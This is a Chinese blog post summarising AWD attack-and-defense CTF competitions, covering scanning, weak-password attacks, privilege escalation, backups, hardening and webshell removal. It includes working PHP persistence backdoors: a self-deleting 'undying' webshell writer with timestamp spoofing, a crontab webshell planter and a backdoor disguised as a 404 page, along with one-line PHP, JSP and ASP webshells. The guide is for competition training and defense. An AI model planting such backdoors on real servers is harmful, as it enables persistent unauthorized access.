赞
踩
最近参加了一些AWD比赛,之前没怎么接触过,顺带做个总结,希望能帮助到大家。
主要题型为WEB和PWN,涉及语言多数为PHP,还有少量Java、Python。
WEB主要是一些CMS和框架安全漏洞,如注入、上传和反序列化等,更多是依赖已知漏洞。
一般比赛会将加固环节和攻击环节分开,先统一加固后再进行攻击。
开赛前会给到参赛选手相关信息,如下图所示:
说明:
标记1:比赛名称
标记2:白名单一般用于防止外部恶意攻击,如果赛方发现名单以外IP 可能会进行封禁处理。
标记3:用户服务器登录,账号为team1 密码为fe85d7dec6e3757f391e013efdd67c0c,端口为2222,一般服务器为Linux系统,登录工具可以使用xSHELL,finalSHELL等。
标记4:Token主要用于脚本身份凭证用于自动化提交鉴别。虚拟IP为靶机访问网址。其他选手地址为192-168-x-250.pvp923.bugku.cn,x可以是1-255内任一个数字。
标记5:主要用于扫描其他选手靶机用来攻击获取到根目录FLAG并提交得分,靶机环境和自己的靶机一致。
标记6:FLAG提交处。
标记7:用于脚本提交的api接口。
标记8:大屏观赛区
也有可能是这种,做个参考吧。
以FinalSHELL为例,使用账户密码登录。
操作如下图所示:
说明:
标记1:主机地址,网址或ip地址都有可能。
标记2:端口信息,根据赛方信息提供
标记3:输入赛方提供的用户名和密码进行登录,用户权限一般较低。有时候会用RSA公钥登录的方式进行登录。
一般使用nmap或httpscan
查看自己主机IP:
ifconfig #Linux ipconfig #Windows
扫描C段存活:
namp -sn 192.168.0.0/24 #扫描C段主机存活 httpscan.py 192.168.0.0/24 –t 10 #扫描C段主机存活
一般先搜集自己的主机端口信息,比赛主机开放端口情况大多情况一致,然后类比指定扫描其他主机端口信息,最后挂后台全端口扫描防止端口遗漏!
nmap -sV 192.168.0.2 #扫描主机系统版本 nmap -sS 192.168.0.2 #扫描主机常用端口 nmap -sS -p 80,445 192.168.0.2 #扫描主机部分端口 nmap -sS -p- 192.168.0.2 #扫描主机全部端口
nmap官方文档:
https://nmap.org/man/zh/man-host-discovery.html
httpscan 主机探测:
https://github.com/zer0h/httpscan
apaech2.conf是主配置文件,不是真正的具体配置文件,它只是把各 个零散的配置文件以inluceding方式包含进来,如下图所示:
组件发现:
find / -name "nginx.conf" #定位nginx目录 find / -path "*nginx*" -name nginx*conf #定位nginx配置目录 find / -name "httpd.conf" #定位apache目录 find / -path "*apache*" -name apache*conf #定位apache配置目录
网站发现:
find / -name "index.php" #定位网站目录
日志发现:
/var/log/nginx/ #默认Nginx日志目录 /var/log/apache/ #默认Apache日志目录 /var/log/apache2/ #默认Apache日志目录 /usr/local/tomcat/logs #Tomcat日志目录 tail -f xxx.log #实时刷新滚动日志文件
以上是定位常见文件目录的命令或方法,比赛需要根据实际情况类推,善用find命令!
自动化利用扫描工具参考:
https://github.com/sry309/ihoneyBakFileScan 多进程批量网站备份文件泄露扫描工具
https://github.com/maurosoria/dirsearch WEB网站目录扫描
端口利用主要方式是未授权访问和弱口令漏洞。
未授权访问漏洞利用总结参考:
未授权访问漏洞总结
常见端口利用总结参考:
常见端口的漏洞总结 - 巨核单线程 - 博客园
部分利用工具参考:
https://github.com/vanhauser-thc/thc-hydra Hydra九头蛇
https://github.com/shack2/SNETCracker 超级弱口令工具
https://github.com/se55i0n/DBScanner 数据库爆破工具
GitHub - cwkiller/unauthorized-check: 扫描常见未授权访问(redis、mongodb、memcached、elasticsearch、zookeeper、ftp、CouchDB、docker、Hadoop) 未授权检测工具
字典参考:
https://github.com/cpkkcb/fuzzDicts
https://github.com/TheKingOfDuck/fuzzDicts
一般通过访问获取的端口就能访问到预设的WEB靶场,如下图所示:
WEB 方面的语言多为PHP,小部分为Java 和Python。这里的WEB环境分两种情况。
一种是已有漏洞的框架,一种是出题人写的框架。如果是已有漏洞的框架,通常会比较明显。比如说Struts2各种漏洞等等,用工具扫就可以扫出来。这个需要准备得比较充分,在电脑中备好 EXP 库、漏洞库和各种扫描工具库,以便能够快速利用比较明显的漏洞。
另一种情况就是分析WEB日志,学习其他选手攻击思路和漏洞利用过程,也是一个不错的得分途径。
别忘了WEB后台弱口令!!
漏洞资料库集合参考:
https://github.com/cckuailong/vulbase
部分已知漏洞检测工具参考:
https://github.com/chaitin/xray 支持被动主动扫描
Goby - Attack surface mapping 主机探测、端口爆破和漏洞检测
GitHub - knownsec/pocsuite3: pocsuite3 is an open-sourced remote vulnerability testing framework developed by the Knownsec 404 Team. 批量利用框架
现在比赛很少直接给予root权限,不多谈。但是加固环节权限过低无法进行,如果比赛允许可以尝试提权。
提权参考:
Linux 提权总结 - 腾讯云开发者社区-腾讯云 一般提权
GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合 提权脚本
拿到WEBSHELL后,需要维持权限!简单的WEBSHELL 一眼就会被识别,在AWD 中优先考虑种不死马、反弹 SHELL等留后门方式维持权限,以便后续刷 FLAG,再考虑提升权限。
隐藏的文件读取
header(php'flag:'.file_get_contents('/tmp/flag'));
条件允许的话,将flag信息直接读取并返回到header头中,这样做不易被发现。
PHP不死马示例:
<?php ignore_user_abort(true); #客户机断开依旧执行 set_time_limit(0); #函数设置脚本最大执行时间。这里设置为0,即没有时间方面的限制。 unlink(__FILE__); 删除文件本身,以起到隐蔽自身的作用。 $file = '2.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; while (1){ file_put_contents($file,$code); system('touch -m -d "2018-12-01 09:10:12" .2.php'); usleep(5000); } ?>
定时任务写马示例:
system('echo "* * * * * echo \"<?php if(md5(\\\\\\\\\$_POST[pass])==\'7b7fdffef464019f7190d0384d5b3838\'){@eval(\\\\\\\\\$_POST[1]);} \" > /var/www/html/.index.php\n* * * * * chmod 777 /var/www/html/.index.php" | crontab;whoami');
一般编写Python脚本或利用CURL工具进行批量获取FLAG得分,需要语言基础。
得分会在大屏幕实时动态展示:
批量利用框架工具:
https://github.com/Ares-X/AWD-Predator-Framework
目的是防止修改源码出错,或被对手恶意删除源码,或快速恢复网站防止被裁判组check探测服务存活失败丢分。
压缩文件:
tar -cvf web.tar /var/www/html zip -q -r web.zip /var/www/html
解压文件:
tar -xvf web.tar -c /var/www/html unzip web.zip -d /var/www/html
备份到服务器:
- mv web.tar /tmp
- mv web.zip /home/xxx
上传下载文件:
scp username@servername:/path/filename /tmp/local_destination #从服务器下载单个文件到本地 scp /path/local_filename username@servername:/path #从本地上传单个文件到服务器 scp -r username@servername:remote_dir/ /tmp/local_dir #从服务器下载整个目录到本地 scp -r /tmp/local_dir username@servername:remote_dir #从本地上传整个目录到服务器
SSH相关工具:
Xshell、SecureCRT、finalshell
FTP相关工具:
FileZilla 、WinSCP、SmartFTP
数据库配置信息一般可以通过如config.php/web.conf等文件获取。
以MySQL数据库备份数据为例:
备份指定数据库:
mysqldump –u username –p password databasename > bak.sql
备份所有数据库:
mysqldump –all -databases > bak.sql
导入数据库:
mysql –u username –p password database < bak.sql
netstat -ano/-a #查看端口情况 uname -a #系统信息 ps -aux、ps -ef #进程信息 cat /etc/passwd #用户情况 ls /home/ #用户情况 id #用于显示用户ID,以及所属群组ID find / -type d -perm -002 #可写目录检查 grep -r “flag” /var/www/html/ #查找默认FLAG
信息搜集后,将未授权和弱口令问题及时修复,包括但不限于服务器SSH口令、数据库口令和WEB服务口令。
千万别忘记WEB应用的后台密码修改!!
passwd username #ssh口令修改 set password for mycms@localhost = password('123'); #MySQL密码修改 find /var/www//html -path '*config*’ #查找配置文件中的密码凭证
find /var/www/html/ -name "*.tar" find /var/www/html/ -name "*.zip"
通过命令查看可疑文件:
find /var/www/html -name *.php -mmin -20 #查看最近20分钟修改文件 find ./ -name '*.php' | xargs wc -l | sort -u #寻找行数最短文件 grep -r --include=*.php '[^a-z]eval($_POST' /var/www/html #查包含关键字的php文件 find /var/www/html -type f -name "*.php" | xargs grep "eval(" |more
一般查杀:河马WEBSHELL和D盾查杀。
# phpwebshell <?php @eval($_GET['cmd']); ?> <?php @eval($_POST['cmd']); ?> <?php @eval($_REQUESTS['cmd']); ?>
# jspwebshell <%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
# aspwebshell <%eval request ("cmd")%> 或 <% execute(request("cmd")) %>
不死马查杀:杀进程后重启服务、写一个同名的文件夹和写一个sleep时间低于别人的马(或者写一个脚本不断删除别人的马)
比如写个马来一直杀死不死马进程:
<?php system("kill -9 pid;rm -rf .shell.php"); #pid和不死马名称根据实际情况定 ?>
后门用户查杀:UID大于500的都是非系统账号,500以下的都为系统保留的账号,使用userdel -r username
完全删除账户
其他查杀:部分后门过于隐蔽,可以使用ls -al
命令查看所有文件及文件修改时间和内容进行综合判断,进行删除。可以写脚本定时清理上传目录、定时任务和临时目录等
经典preg_replace伪装的404后门示例:
使用菜刀连接 密码:error
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
ps -aux #查看进程 kill -9 pid #强制进程查杀
netstat -anp #查看端口 firewall-cmd --zone= public --remove-port=80/tcp –permanent #关闭端口 firewall-cmd –reload #重载防火墙
漏洞修复遵循保证服务不长时间宕机的情况下进行修复, 多使用安全过滤函数,能修复尽量修复,不能修复先注释或删除相关代码,但需保证页面显示正常。
可以下载文件到本地进行修改后上传到服务器进行覆盖操作,也可以直接通过vim编辑器进行代码修复操作!
修复参考:
Web常见漏洞描述及修复建议 - 我超怕的 - 博客园 常规漏洞修复建议
PHP中的安全函数 - 踏雪无痕SS - 博客园 PHP安全函数
文件监控能及时木马文件后门生成,及时删除防止丢分。
文件监控脚本:
https://github.com/TheKingOfDuck/FileMonitor
比赛规则决定能否部署WAF和监控工具。WAF具有两面性,抵挡大部分攻击的同时,可能因为某些函数无法使用导致服务宕机。WAF可以自己写,也可以使用如安全狗等第三方WAF。
常见PHP网站系统WAF添加路径:
- DiscuzX2 \config\config_global.php
-
- Wordpress \wp-config.php
-
- Metinfo \include\head.php
-
- PHPCMS V9 \phpcms\base.php
-
- PHPWIND8.7 \data\sql_config.php
-
- DEDECMS5.7 \data\common.inc.php
WAF脚本参考:
https://github.com/sharpleung/CTF-WAF
关于Awd的小结 - 先知社区 关于Awd的小结
AWD比赛常规套路 - 北极边界安全团队 - 博客园 AWD比赛常规套路
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。